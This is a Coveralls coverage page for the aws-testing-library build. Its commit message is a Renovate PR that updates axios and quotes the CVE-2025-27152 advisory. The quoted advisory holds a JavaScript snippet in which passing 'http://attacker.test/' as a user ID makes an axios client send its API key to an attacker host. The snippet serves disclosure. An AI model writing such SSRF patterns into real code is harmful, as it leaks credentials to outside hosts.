erezrokah / aws-testing-library / 15509187305
100%
master: 100%

LAST BUILD BRANCH: renovate/major-commitlint-monorepo
DEFAULT BRANCH: master
Ran
Jobs 6
Files 34
Run time 1min
Badge
Embed ▾
README BADGES
x

If you need to use a raster PNG badge, change the '.svg' to '.png' in the link

Markdown

Textile

RDoc

HTML

Rst
coverage: 99.726%. Remained the same
15509187305

push

github

web-flow 
fix(deps): update dependency axios to ^0.30.0 [security] (#932)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [axios](https://axios-http.com)
([source](https://redirect.github.com/axios/axios)) | [`^0.29.0` ->
`^0.30.0`](https://renovatebot.com/diffs/npm/axios/0.29.0/0.30.0) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/axios/0.30.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/axios/0.30.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/axios/0.29.0/0.30.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/axios/0.29.0/0.30.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2025-27152](https://redirect.github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6)

### Summary

A previously reported issue in axios demonstrated that using
protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than
protocol-relative URLs to axios has been identified. Even if ⁠`baseURL`
is set, axios sends the request to the specified absolute URL,
potentially causing SSRF and credential leakage. This issue impacts both
server-side and client-side usage of axios.

### Details

Consider the following code snippet:

```js
import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF
```

In this example, the request is sent to `http://attacker.test/` in... (continued)

122 of 124 branches covered (98.39%)

Branch coverage included in aggregate %.

606 of 606 relevant lines covered (100.0%)

27.89 hits per line

Jobs
ID Job ID Ran Files Coverage
1 run-windows-latest-node-lts/* - 15509187305.1 34
99.73
 GitHub Action Run
2 run-macos-latest-node-16.10.0 - 15509187305.2 34
99.73
 GitHub Action Run
3 run-ubuntu-latest-node-16.10.0 - 15509187305.3 34
99.73
 GitHub Action Run
4 run-windows-latest-node-16.10.0 - 15509187305.4 34
99.73
 GitHub Action Run
5 run-ubuntu-latest-node-lts/* - 15509187305.5 34
99.73
 GitHub Action Run
6 run-macos-latest-node-lts/* - 15509187305.6 34
99.73
 GitHub Action Run
Source Files on build 15509187305